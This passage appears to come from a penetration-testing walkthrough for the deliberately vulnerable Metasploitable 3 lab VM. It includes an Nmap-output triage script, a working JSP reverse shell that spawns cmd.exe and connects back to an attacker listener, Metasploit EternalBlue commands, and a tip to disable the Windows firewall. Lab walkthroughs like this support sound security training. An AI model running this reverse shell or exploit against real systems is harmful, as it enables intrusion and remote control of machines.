- Exploitation of application-layer vulnerabilities, such as unauthenticated access to Jenkins or misconfigured Tomcat servers, which can lead to privileged shell access.
Once the VM is live, the first step is identifying its IP address and open services.

### Network Discovery

Use `netdiscover` or an Nmap ping sweep (`nmap -sn [network]`) to find the target's IP.

### Service Enumeration
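To turn the Nmap output into a prioritised target list, here is an added Python example (not code from the original walkthrough) that parses grepable (`-oG`) output, lists the open ports per host and flags the services this walkthrough goes after (Tomcat, Jenkins, SMB). The scan output embedded in it is a constructed sample; the ports, banners and the keyword-to-note mapping are assumptions for illustration, not results from a real Metasploitable 3 scan.

```python
"""Triage nmap grepable (-oG) output: open ports per host, plus a list of
services worth attacking first on this kind of target."""
import re
import sys
from collections import defaultdict

# Constructed sample of `nmap -sV -oG - <target>` output (not real scan data).
# Note nmap escapes "/" inside version banners as "\/".
SAMPLE_OG = """\
# Nmap 7.94 scan initiated as: nmap -sV -oG - 192.168.56.20
Host: 192.168.56.20 ()\tStatus: Up
Host: 192.168.56.20 ()\tPorts: 445/open/tcp//microsoft-ds//Microsoft Windows Server 2008 R2 - 2012 microsoft-ds/, 8080/open/tcp//http//Apache Tomcat\\/Coyote JSP engine 1.1/, 8484/open/tcp//http//Jetty 9.4.z-SNAPSHOT (Jenkins)/, 3389/filtered/tcp//ms-wbt-server///\tIgnored State: closed (996)
# Nmap done at Mon Jan  1 00:00:00 2024 -- 1 IP address (1 host up) scanned
"""

# Substrings (matched case-insensitively against "service version") that mark
# a service as a priority for this walkthrough. Assumed mapping, edit to taste.
INTERESTING = {
    "tomcat": "Tomcat: try manager app / WAR deploy",
    "jenkins": "Jenkins: try script console",
    "microsoft-ds": "SMB: check MS17-010 (EternalBlue) before anything else",
}


def parse_grepable(text):
    """Return {host: [(port, proto, state, service, version), ...]} from -oG text."""
    hosts = defaultdict(list)
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        # Fields are tab-separated "Key: value" pairs, e.g. "Ports: ..." / "Status: Up".
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        addr = fields["Host"].split()[0]          # "192.168.56.20 ()" -> address only
        ports = fields.get("Ports")
        if not ports:                             # "Status: Up" lines carry no ports
            continue
        for entry in ports.split(", "):
            # port/state/proto/owner/service/rpcinfo/version; split on unescaped "/" only
            parts = re.split(r"(?<!\\)/", entry)
            if len(parts) < 7:
                continue
            port, state, proto, _owner, service, _rpc, version = parts[:7]
            hosts[addr].append(
                (int(port), proto, state, service, version.replace("\\/", "/"))
            )
    return dict(hosts)


def open_ports(hosts, addr):
    """Sorted list of ports in state 'open' for one host (filtered ports excluded)."""
    return sorted(p[0] for p in hosts.get(addr, []) if p[2] == "open")


def flag_interesting(hosts):
    """Return [(host, port, note)] for open services whose name or banner matches
    one of the INTERESTING keywords, in scan order."""
    hits = []
    for addr, entries in hosts.items():
        for port, _proto, state, service, version in entries:
            if state != "open":
                continue
            haystack = f"{service} {version}".lower()
            for keyword, note in INTERESTING.items():
                if keyword in haystack:
                    hits.append((addr, port, note))
    return hits


if __name__ == "__main__":
    # Usage: python triage.py scan.gnmap   (falls back to the embedded sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_OG
    scanned = parse_grepable(text)
    for host in scanned:
        print(f"{host}: open ports {open_ports(scanned, host)}")
    for host, port, note in flag_interesting(scanned):
        print(f"  {host}:{port}  {note}")
```

Feed it the output of `nmap -sV -oG scan.gnmap [target IP]`; `-sV` matters because the keyword matching looks at the version banner, not only the port number, so a Tomcat on a non-default port is still flagged. Filtered ports are parsed but never reported as open.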
| Problem | Solution |
|---------|----------|
| VM won't build | Use Hyper-V (not VirtualBox). Run `vagrant up --provider=hyperv` |
| EternalBlue crashes target | Increase `GroomAllocations` to 12, set `VerifyTarget` to false |
| Firewall blocks reverse shell | Inside the VM: `netsh advfirewall set allprofiles state off` |
| Tomcat 404 after deploy | Ensure the context path matches the WAR filename. Use `/shell` as the context. |

The reverse shell JSP packaged into the WAR for the Tomcat deployment (the `host` value is the attacker's listener, and the JSP page directives wrap the page's original Java so it compiles as-is):

```jsp
<%@ page import="java.io.*" %>
<%@ page import="java.net.*" %>
<%
// Attacker listener (change to your own IP/port) and the process to spawn.
String host="192.168.56.10";
int port=4444;
String cmd="cmd.exe";
// Start cmd.exe with stderr merged into stdout, then connect back to the listener.
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(), pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(), so=s.getOutputStream();
// Pump bytes both ways until the socket closes or cmd.exe exits.
while(!s.isClosed()) {
  while(pi.available()>0) so.write(pi.read());   // process stdout -> socket
  while(pe.available()>0) so.write(pe.read());   // process stderr -> socket
  while(si.available()>0) po.write(si.read());   // socket -> process stdin
  so.flush();
  po.flush();
  Thread.sleep(50);
  // exitValue() throws while the process is still running; once it returns, stop.
  try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();
%>
```
The machine is also vulnerable to classic Windows exploits such as MS17-010 (EternalBlue). If SMB is unpatched, you can jump straight to SYSTEM-level access with the Metasploit module:

```
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS [target IP]
set LHOST [attacker IP]
exploit
```

If the target blue-screens instead of returning a shell, see the troubleshooting table above (raise `GroomAllocations`, set `VerifyTarget` to false) and retry.

## 4. Post-Exploitation
Now that you’re SYSTEM, what next?